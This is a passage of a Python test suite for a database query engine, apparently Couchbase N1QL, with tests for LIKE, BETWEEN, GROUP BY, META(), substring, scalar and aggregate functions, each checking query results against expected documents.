actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if vm["os"].find('cent') == -1]) == len(doc["VMs"]) and
len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_like_aliases(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name AS NAME from %s " % query_bucket + \
"AS EMPLOYEE where EMPLOYEE.name LIKE '_mpl%' ORDER BY name"
actual_result = self.run_cbq_query()
self.query = "select name AS NAME from %s " % query_bucket + \
"AS EMPLOYEE where reverse(EMPLOYEE.name) LIKE '%lpm_' ORDER BY name"
actual_result1 = self.run_cbq_query()
self.assertEqual(actual_result['results'], actual_result1['results'])
expected_result = [{"NAME": doc['name']} for doc in self.full_list
if doc["name"].find('mpl') == 1]
expected_result = sorted(expected_result, key=lambda doc: (doc['NAME']))
self._verify_results(actual_result['results'], expected_result)
def test_like_wildcards(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT email FROM %s WHERE email " % query_bucket + \
"LIKE '%@%.%' ORDER BY email"
actual_result = self.run_cbq_query()
self.query = "SELECT email FROM %s WHERE reverse(email) " % query_bucket + \
"LIKE '%.%@%' ORDER BY email"
actual_result1 = self.run_cbq_query()
self.assertEqual(actual_result['results'], actual_result1['results'])
expected_result = [{"email": doc['email']} for doc in self.full_list
if re.match(r'.*@.*\..*', doc['email'])]
expected_result = sorted(expected_result, key=lambda doc: (doc['email']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT email FROM %s WHERE email" % query_bucket + \
" LIKE '%@%.h' ORDER BY email"
actual_result = self.run_cbq_query()
expected_result = []
self._verify_results(actual_result['results'], expected_result)
def test_prepared_like_wildcards(self):
self.fail_if_no_buckets()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
for query_bucket in self.query_buckets:
self.query = "SELECT email FROM %s WHERE email " % query_bucket + \
"LIKE '%@%.%' ORDER BY email"
self.prepared_common_body()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 1)
def test_between(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM {0} WHERE join_mo BETWEEN 1 AND 6 ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list if 1 <= doc["join_mo"] <= 6]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT name FROM {0} WHERE join_mo NOT BETWEEN 1 AND 6 ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list if not 1 <= doc["join_mo"] <= 6]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_between_negative(self):
queries_errors = {'SELECT name FROM %s WHERE join_mo BETWEEN 1 AND -10 ORDER BY name': ('syntax error', 3000),
'SELECT name FROM %s WHERE join_mo BETWEEN 1 AND a ORDER BY name': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
##############################################################################################
#
# GROUP BY
##############################################################################################
def test_group_by(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 AS task from %s " % query_bucket + \
"WHERE join_mo>7 GROUP BY tasks_points.task1 " + \
"ORDER BY tasks_points.task1"
if self.analytics:
self.query = "SELECT d.tasks_points.task1 AS task from %s d " % query_bucket + \
"WHERE d.join_mo>7 GROUP BY d.tasks_points.task1 " + \
"ORDER BY d.tasks_points.task1"
actual_result = self.run_cbq_query()
expected_result = [{"task": doc['tasks_points']["task1"]}
for doc in self.full_list
if doc["join_mo"] > 7]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result['results'], expected_result)
def test_group_by_having(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "from %s WHERE join_mo>7 GROUP BY tasks_points.task1 " % query_bucket + \
"HAVING COUNT(tasks_points.task1) > 0 SELECT tasks_points.task1 " + \
"AS task ORDER BY tasks_points.task1"
actual_result = self.run_cbq_query()
expected_result = [{"task": doc['tasks_points']["task1"]}
for doc in self.full_list
if doc["join_mo"] > 7]
expected_result = [doc for doc in expected_result
if expected_result.count(doc) > 0]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result['results'], expected_result)
def test_group_by_aggr_fn(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 AS task from %s " % query_bucket + \
"WHERE join_mo>7 GROUP BY tasks_points.task1 " + \
"HAVING COUNT(tasks_points.task1) > 0 AND " + \
"(MIN(join_day)=1 OR MAX(join_yr=2011)) " + \
"ORDER BY tasks_points.task1"
actual_result = self.run_cbq_query()
if self.analytics:
self.query = "SELECT d.tasks_points.task1 AS task from %s d " % query_bucket + \
"WHERE d.join_mo>7 GROUP BY d.tasks_points.task1 " + \
"HAVING COUNT(d.tasks_points.task1) > 0 AND " + \
"(MIN(d.join_day)=1 OR MAX(d.join_yr=2011)) " + \
"ORDER BY d.tasks_points.task1"
tmp_groups = {doc['tasks_points']["task1"] for doc in self.full_list}
expected_result = [{"task": group} for group in tmp_groups
if [doc['tasks_points']["task1"]
for doc in self.full_list].count(group) > 0 and
(min([doc["join_day"] for doc in self.full_list
if doc['tasks_points']["task1"] == group]) == 1 or
max([doc["join_yr"] for doc in self.full_list
if doc['tasks_points']["task1"] == group]) == 2011)]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result['results'], expected_result)
def test_prepared_group_by_aggr_fn(self):
self.fail_if_no_buckets()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 AS task from %s " % query_bucket + \
"WHERE join_mo>7 GROUP BY tasks_points.task1 " + \
"HAVING COUNT(tasks_points.task1) > 0 AND " + \
"(MIN(join_day)=1 OR MAX(join_yr=2011)) " + \
"ORDER BY tasks_points.task1"
self.prepared_common_body()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 1)
self.query = "delete from system:prepareds"
self.run_cbq_query()
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
def test_group_by_satisfy(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, AVG(test_rate) as avg_rate FROM %s d " % query_bucket + \
"WHERE (ANY skill IN d.skills SATISFIES skill = 'skill2010' end) " + \
"AND (ANY vm IN d.VMs SATISFIES vm.RAM = 5 end) " + \
"GROUP BY job_title ORDER BY job_title"
if self.analytics:
self.query = "SELECT d.job_title, AVG(d.test_rate) as avg_rate FROM %s d " % query_bucket + \
"WHERE (ANY skill IN d.skills SATISFIES skill = 'skill2010' end) " + \
"AND (ANY vm IN d.VMs SATISFIES vm.RAM = 5 end) " + \
"GROUP BY d.job_title ORDER BY d.job_title"
actual_result = self.run_cbq_query()
tmp_groups = {doc["job_title"] for doc in self.full_list}
expected_result = [{"job_title": doc['job_title'],
"test_rate": doc["test_rate"]}
for doc in self.full_list
if 'skill2010' in doc["skills"] and
len([vm for vm in doc["VMs"] if vm["RAM"] == 5]) > 0]
expected_result = [{"job_title": group,
"avg_rate": math.fsum([doc["test_rate"]
for doc in expected_result
if doc["job_title"] == group]) /
len([doc["test_rate"] for doc in expected_result
if doc["job_title"] == group])}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_group_by_negative(self):
queries_errors = {"SELECT tasks_points from {0} WHERE tasks_points.task2>3" +
" GROUP BY tasks_points.*":
('syntax error', 3000),
"from {0} WHERE join_mo>7 GROUP BY tasks_points.task1 " +
"SELECT tasks_points.task1 AS task HAVING COUNT(tasks_points.task1) > 0":
('syntax error', 3000)}
self.negative_common_body(queries_errors)
# This test has no usages anywhere
def test_groupby_first(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select job_title, (FIRST p FOR p IN ARRAY_AGG(name) END) as names from {0} group by " \
"job_title order by job_title ".format(query_bucket)
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_list = [{"job_title": group,
"names": ([x["name"] for x in self.full_list
if x["job_title"] == group][0])}
for group in tmp_groups]
expected_result = self.sort_nested_list(expected_list)
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self.assertTrue(actual_result['results'] == expected_result)
##############################################################################################
#
# SCALAR FN
##############################################################################################
def test_ceil(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, ceil(test_rate) as rate from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['rate']))
expected_result = [{"name": doc['name'], "rate": math.ceil(doc['test_rate'])}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['rate']))
self._verify_results(actual_result, expected_result)
self.query = "select name from %s where ceil(test_rate) > 5" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name']} for doc in self.full_list
if math.ceil(doc['test_rate']) > 5]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_floor(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, floor(test_rate) as rate from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['rate']))
expected_result = [{"name": doc['name'], "rate": math.floor(doc['test_rate'])}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['rate']))
self._verify_results(actual_result, expected_result)
self.query = "select name from %s where floor(test_rate) > 5" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name']} for doc in self.full_list
if math.floor(doc['test_rate']) > 5]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
self.query = "select name from %s where floor(job_title) > 5" % query_bucket
actual_result = self.run_cbq_query()
self._verify_results(actual_result['results'], [])
def test_greatest(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, GREATEST(skills[0], skills[1]) as SKILL from %s" % (
query_bucket)
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['SKILL']))
expected_result = [{"name": doc['name'], "SKILL":
(doc['skills'][0], doc['skills'][1])[doc['skills'][0] < doc['skills'][1]]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['SKILL']))
self._verify_results(actual_result, expected_result)
def test_least(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, LEAST(skills[0], skills[1]) as SKILL from %s" % (
query_bucket)
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['SKILL']))
expected_result = [{"name": doc['name'], "SKILL":
(doc['skills'][0], doc['skills'][1])[doc['skills'][0] > doc['skills'][1]]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['SKILL']))
self._verify_results(actual_result, expected_result)
def test_meta(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT distinct name FROM %s d WHERE META(d).`type` = "json"' % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name']} for doc in self.full_list]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT distinct name FROM %s WHERE META().id IS NOT NULL" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_meta_like(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT name FROM %s d WHERE META(d).id LIKE "%s"' % (query_bucket, "query%")
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name']} for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_prepared_meta_like(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT name FROM %s d WHERE META(d).id ' % query_bucket + 'LIKE "employee%"'
self.prepared_common_body()
if self.monitoring:
self.query = 'select * from system:completed_requests'
result = self.run_cbq_query()
request_id = result['request_id']
self.query = 'delete from system:completed_requests where request_id = "%s"' % request_id
self.run_cbq_query()
result = self.run_cbq_query(
'select * from system:completed_requests where request_id = "%s"' % request_id)
self.assertTrue(result['metrics']['resultCount'] == 0)
def test_meta_flags(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT DISTINCT META().flags as flags FROM %s' % query_bucket
actual_result = self.run_cbq_query()
expected_result = [{"flags": self.item_flag}]
self._verify_results(actual_result['results'], expected_result)
def test_long_values(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'insert into %s values("k051", { "id":-9223372036854775808 } )' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s values("k031", { "id":-9223372036854775807 } )' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s values("k021", { "id":1470691191458562048 } )' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s values("k011", { "id":9223372036854775807 } )' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s values("k041", { "id":9223372036854775808 } )' % query_bucket
self.run_cbq_query()
self.query = 'select * from ' + query_bucket + ' d where meta().id = "{0}"'.format("k051")
actual_result = self.run_cbq_query()
print("k051 results is {0}".format(actual_result['results'][0]['d']))
# self.assertEqual(actual_result['results'][0]["default"],{'id': -9223372036854775808})
self.query = 'select * from ' + query_bucket + ' d where meta().id = "{0}"'.format("k031")
actual_result = self.run_cbq_query()
print("k031 results is {0}".format(actual_result['results'][0]['d']))
# self.assertEqual(actual_result['results'][0]["default"],{'id': -9223372036854775807})
self.query = 'select * from ' + query_bucket + ' d where meta().id = "{0}"'.format("k021")
actual_result = self.run_cbq_query()
print("k021 results is {0}".format(actual_result['results'][0]['d']))
# self.assertEqual(actual_result['results'][0]["default"],{'id': 1470691191458562048})
self.query = 'select * from ' + query_bucket + ' d where meta().id = "{0}"'.format("k011")
actual_result = self.run_cbq_query()
print("k011 results is {0}".format(actual_result['results'][0]['d']))
# self.assertEqual(actual_result['results'][0]["default"],{'id': 9223372036854775807})
self.query = 'select * from ' + query_bucket + ' d where meta().id = "{0}"'.format("k041")
actual_result = self.run_cbq_query()
print("k041 results is {0}".format(actual_result['results'][0]['d']))
# self.assertEqual(actual_result['results'][0]["default"],{'id': 9223372036854776000L})
self.query = 'delete from ' + query_bucket + ' where meta().id in ["k051","k021","k011","k041","k031"]'
self.run_cbq_query()
def test_meta_cas(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select meta().cas from {0} order by meta().id limit 10'.format(query_bucket)
actual_result = self.run_cbq_query()
print(actual_result)
def test_meta_negative(self):
queries_errors = {'SELECT distinct name FROM %s WHERE META().type = "json"': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_length(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'Select name, email from %s where LENGTH(job_title) = 5' % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name'], "email": doc['email']}
for doc in self.full_list
if len(doc['job_title']) == 5]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_upper(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT DISTINCT UPPER(job_title) as JOB from %s' % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['JOB']))
expected_result = [{"JOB": doc['job_title'].upper()}
for doc in self.full_list]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: (doc['JOB']))
self._verify_results(actual_result, expected_result)
def test_lower(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT distinct email from %s" % query_bucket + \
" WHERE LOWER(job_title) < 't'"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['email']))
expected_result = [{"email": doc['email'].lower()}
for doc in self.full_list
if doc['job_title'].lower() < 't']
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: (doc['email']))
self._verify_results(actual_result, expected_result)
def test_round(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, round(test_rate) as rate from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['rate']))
expected_result = [{"name": doc["name"], "rate": round(doc['test_rate'])}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['rate']))
self._verify_results(actual_result, expected_result)
def test_trunc(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, TRUNC(test_rate, 0) as rate from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['rate']))
expected_result = [{"name": doc["name"], "rate": math.trunc(doc['test_rate'])}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['rate']))
self._verify_results(actual_result, expected_result)
def test_first(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, FIRST vm.os for vm in VMs end as OS from %s" % (
query_bucket)
if self.analytics:
self.query = "select name, VMs[0].os as OS from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['OS']))
expected_result = [{"name": doc["name"], "OS": doc['VMs'][0]["os"]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['OS']))
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# Substring
##############################################################################################
def test_substr(self):
self.fail_if_no_buckets()
indices_to_test = [-100, -2, -1, 0, 1, 2, 100]
for index in indices_to_test:
for query_bucket in self.query_buckets:
self.query = "select name, SUBSTR(email, %s) as DOMAIN from %s" % (
str(index), query_bucket)
query_result = self.run_cbq_query()
query_docs = query_result['results']
sorted_query_docs = sorted(query_docs,
key=lambda doc: (doc['name'], doc['DOMAIN']))
expected_result = [{"name": doc["name"],
"DOMAIN": self.expected_substr(doc['email'], 0, index)}
for doc in self.full_list]
sorted_expected_result = sorted(expected_result, key=lambda doc: (
doc['name'], doc['DOMAIN']))
self._verify_results(sorted_query_docs, sorted_expected_result)
def test_substr0(self):
self.fail_if_no_buckets()
indices_to_test = [-100, -2, -1, 0, 1, 2, 100]
for index in indices_to_test:
for query_bucket in self.query_buckets:
self.query = "select name, SUBSTR0(email, %s) as DOMAIN from %s" % (
str(index), query_bucket)
query_result = self.run_cbq_query()
query_docs = query_result['results']
sorted_query_docs = sorted(query_docs,
key=lambda doc: (doc['name'], doc['DOMAIN']))
expected_result = [{"name": doc["name"],
"DOMAIN": self.expected_substr(doc['email'], 0, index)}
for doc in self.full_list]
sorted_expected_result = sorted(expected_result, key=lambda doc: (
doc['name'], doc['DOMAIN']))
self._verify_results(sorted_query_docs, sorted_expected_result)
def test_substr1(self):
self.fail_if_no_buckets()
indices_to_test = [-100, -2, -1, 0, 1, 2, 100]
for index in indices_to_test:
for query_bucket in self.query_buckets:
self.query = "select name, SUBSTR1(email, %s) as DOMAIN from %s" % (
str(index), query_bucket)
query_result = self.run_cbq_query()
query_docs = query_result['results']
sorted_query_docs = sorted(query_docs,
key=lambda doc: (doc['name'], doc['DOMAIN']))
expected_result = [{"name": doc["name"],
"DOMAIN": self.expected_substr(doc['email'], 1, index)}
for doc in self.full_list]
sorted_expected_result = sorted(expected_result, key=lambda doc: (
doc['name'], doc['DOMAIN']))
self._verify_results(sorted_query_docs, sorted_expected_result)
##############################################################################################
#
# AGGR FN
##############################################################################################
def test_agg_counters(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
vals = []
keys = []
for i in range(10):
new_val = random.randint(0, 99)
new_counter = "counter_US" + str(i)
vals.append(new_val)
keys.append(new_counter)
self.query = 'INSERT INTO %s VALUES ("%s",%s)' % (query_bucket, new_counter, new_val)
self.run_cbq_query()
self.query = 'SELECT sum(d) FROM %s d USE KEYS %s;' % (query_bucket, str(keys))
actual_results = self.run_cbq_query()
self.assertEqual(actual_results['results'][0]['$1'], sum(vals))
self.query = 'SELECT avg(d) FROM %s d USE KEYS %s;' % (query_bucket, str(keys))
actual_results = self.run_cbq_query()
self.assertEqual(actual_results['results'][0]['$1'], float(sum(vals)) / max(len(vals), 1))
self.query = 'DELETE FROM %s USE KEYS %s;' % (query_bucket, str(keys))
actual_results = self.run_cbq_query()
self.assertEqual(actual_results['results'], [])
def test_sum(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, SUM(tasks_points.task1) as points_sum" + \
" FROM %s WHERE join_mo < 5 GROUP BY join_mo " % query_bucket + \
"ORDER BY join_mo"
if self.analytics:
self.query = "SELECT d.join_mo, SUM(d.tasks_points.task1) as points_sum" + \
" FROM %s d WHERE d.join_mo < 5 GROUP BY d.join_mo " % query_bucket + \
"ORDER BY d.join_mo"
actual_result = self.run_cbq_query()
tmp_groups = {doc['join_mo'] for doc in self.full_list
if doc['join_mo'] < 5}
expected_result = [{"join_mo": group,
"points_sum": int(math.fsum([doc['tasks_points']['task1']
for doc in self.full_list
if doc['join_mo'] == group]))}
for group in tmp_groups]
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT join_mo, SUM(test_rate) as rate FROM %s " % query_bucket + \
"as employees WHERE job_title='Sales' GROUP BY join_mo " + \
"HAVING SUM(employees.test_rate) > 0 and " + \
"SUM(test_rate) < 100000"
if self.analytics:
self.query = "SELECT d.join_mo, SUM(d.test_rate) as rate FROM %s d " % query_bucket + \
" WHERE d.job_title='Sales' GROUP BY d.join_mo " + \
"HAVING SUM(d.test_rate) > 0 and " + \
"SUM(d.test_rate) < 100000"
actual_result = self.run_cbq_query()
actual_result = [{"join_mo": doc["join_mo"], "rate": round(doc["rate"])} for doc in
actual_result['results']]
actual_result = sorted(actual_result, key=lambda doc: (doc['join_mo']))
tmp_groups = {doc['join_mo'] for doc in self.full_list}
expected_result = [{"join_mo": group,
"rate": round(math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']))}
for group in tmp_groups
if math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) > 0 and
math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) < 100000]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_mo']))
self._verify_results(actual_result, expected_result)
def test_prepared_sum(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, SUM(tasks_points.task1) as points_sum" + \
" FROM %s WHERE join_mo < 5 GROUP BY join_mo " % query_bucket + \
"ORDER BY join_mo"
self.prepared_common_body()
def test_sum_negative(self):
queries_errors = {'SELECT join_mo, SUM(job_title) as rate FROM %s as employees' +
' WHERE job_title="Sales" GROUP BY join_mo': ('syntax error', 3000),
'SELECT join_mo, SUM(VMs) as rate FROM %s as employees' +
' WHERE job_title="Sales" GROUP BY join_mo': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_avg(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, AVG(tasks_points.task1) as points_avg" + \
" FROM %s WHERE join_mo < 5 GROUP BY join_mo " % query_bucket + \
"ORDER BY join_mo"
if self.analytics:
self.query = "SELECT d.join_mo, AVG(d.tasks_points.task1) as points_avg" + \
" FROM %s d WHERE d.join_mo < 5 GROUP BY d.join_mo " % query_bucket + \
"ORDER BY d.join_mo"
actual_result = self.run_cbq_query()
tmp_groups = {doc['join_mo'] for doc in self.full_list if doc['join_mo'] < 5}
expected_result = [{"join_mo": group,
"points_avg": math.fsum([doc['tasks_points']['task1']
for doc in self.full_list
if doc['join_mo'] == group]) /
len([doc['tasks_points']['task1']
for doc in self.full_list
if doc['join_mo'] == group])}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_mo']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT join_mo, AVG(test_rate) as rate FROM %s " % query_bucket + \
"as employees WHERE job_title='Sales' GROUP BY join_mo " + \
"HAVING AVG(employees.test_rate) > 0 and " + \
"SUM(test_rate) < 100000"
if self.analytics:
self.query = "SELECT d.join_mo, AVG(d.test_rate) as rate FROM %s d" % query_bucket + \
" WHERE d.job_title='Sales' GROUP BY d.join_mo " + \
"HAVING AVG(d.test_rate) > 0 and " + \
"SUM(d.test_rate) < 100000"
actual_result = self.run_cbq_query()
actual_result = [{'join_mo': doc['join_mo'],
'rate': round(doc['rate'], 2)}
for doc in actual_result['results']]
actual_result = sorted(actual_result, key=lambda doc: (doc['join_mo']))
tmp_groups = {doc['join_mo'] for doc in self.full_list}
expected_result = [{"join_mo": group,
"rate": math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) /
len([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales'])}
for group in tmp_groups
if (math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) /
len([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) > 0) and
math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) < 100000]
expected_result = [{'join_mo': doc['join_mo'],
'rate': round(doc['rate'], 2)}
for doc in expected_result]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_mo']))
self._verify_results(actual_result, expected_result)
def test_min(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT join_mo, MIN(test_rate) as rate FROM %s " % query_bucket + \
"as employees WHERE job_title='Sales' GROUP BY join_mo " + \
"HAVING MIN(employees.test_rate) > 0 and " + \
"SUM(test_rate) < 100000"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['join_mo']))
tmp_groups = {doc['join_mo'] for doc in self.full_list}
expected_result = [{"join_mo": group,
"rate": min([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales'])}
for group in tmp_groups
if min([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) > 0 and
math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) < 100000]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_mo']))
self._verify_results(actual_result, expected_result)
def test_max(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, MAX(test_rate) as rate FROM %s " % query_bucket + \
"as employees WHERE job_title='Sales' GROUP BY join_mo " + \
"HAVING MAX(employees.test_rate) > 0 and " + \
"SUM(test_rate) < 100000"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['join_mo']))
tmp_groups = {doc['join_mo'] for doc in self.full_list}
expected_result = [{"join_mo": group,
"rate": max([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales'])}
for group in tmp_groups
if max([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) > 0 and
math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) < 100000]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_mo']))
self._verify_results(actual_result, expected_result)
def test_array_agg_distinct(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_agg(DISTINCT name) as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_list = [{"job_title": group, "names": {x["name"] for x in self.full_list
if x["job_title"] == group}} for group in tmp_groups]
expected_result = self.sort_nested_list(expected_list)
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
def test_array_length(self):
self.fail_if_no_buckets()
